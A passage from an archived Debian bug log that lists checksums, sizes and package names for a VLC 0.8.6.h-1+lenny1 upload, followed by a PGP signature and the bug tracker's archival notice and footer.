 217b19a6efaf83d56151a2c7fab639d63046bd40764cc4c673ac1b5317e3819e 461398 libvlc0_0.8.6.h-1+lenny1_i386.deb
 9910352fb40ec4c4ccaaf4118f4b921c0342eb8ab3facc61540a78b78029d032 479384 libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
 700bea215bfd71cc7e0d167805b0144dfe6021ac6dbb4d30508308f19f9c95cd 5264 vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
 33bdceb86b8ab6ace94a50852189e7f494e04a92dcad51e435f0bf74ec6aed42 11112 vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
 88ba151308739abdb90986c237f7d65455ec421ee8d0eff1a93ca40eeff174a1 6132 vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
 65ac9f11003fb228c7bb0fdf0a0f5c5be30cacd1f91d9a48f2fb31bb3d76c675 4268 vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
 af88d597e88aba46f8e979d835c691208fc438b3865f70a7d26a9b0ede8ceb92 4394 vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
 da841136a57ad24f80bdab96d8f66b92e88d7bd0f8e6c7a0aaca5719ce08c891 36996 mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
 854cb7277eec5860ffc050e1dc7edae6f430509c3d859d54017a1df3f2923ac7 4866 vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
 62604f46cd19cf7b66a663ae51771290883e433c07c0c006ab1e13ee6db8d33f 5164 vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb
Files: 
 d5a3621ca07894bf4f5ef2cd5e8cc3f1 3081 graphics optional vlc_0.8.6.h-1+lenny1.dsc
 9b3e15802b482cb12e79d2eb8cc4ea98 16977154 graphics optional vlc_0.8.6.h.orig.tar.gz
 bfa7d0e2382c30f8006f0e4360da7281 42849 graphics optional vlc_0.8.6.h-1+lenny1.diff.gz
 b667a1cb71f8c9b16a49d3956090fb94 1083962 graphics optional vlc_0.8.6.h-1+lenny1_i386.deb
 217c9534ff983550f1b954d5e640b919 4994140 net optional vlc-nox_0.8.6.h-1+lenny1_i386.deb
 5f963735d300f179d6ba9f4fec8e94fc 461398 libs optional libvlc0_0.8.6.h-1+lenny1_i386.deb
 a4087e43d2bd9a9c0490575832f7e49f 479384 libdevel optional libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
 1496125ee4cbc841d1bf4115ab4eedf9 5264 graphics optional vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
 1ab8ccd14a53a87161fde3041659fdd4 11112 graphics optional vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
 10b5ee98dcc2fd5a51bbe1e4e5509851 6132 graphics optional vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
 895cac6f82e558854c66f8788f93db32 4268 graphics optional vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
 e2ff41c933a2ff0c04819daf5187061a 4394 graphics optional vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
 445ee65daca298e8498d63f52de51334 36996 graphics optional mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
 a81b738ecfa5eeacd81736b91757b7e4 4866 graphics optional vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
 361c1b7c9d410b068df4ef99ac132ad9 5164 graphics optional vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkjNHHAACgkQ62zWxYk/rQd0ZACfaHpQrS3/LCGqp5S9O5MHxK0X
G3MAoIWZJEDFiW5tr4dI5SeCes+gKYAV
=DAXB
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 14 Oct 2008 07:32:12 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Apr 17 04:23:48 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.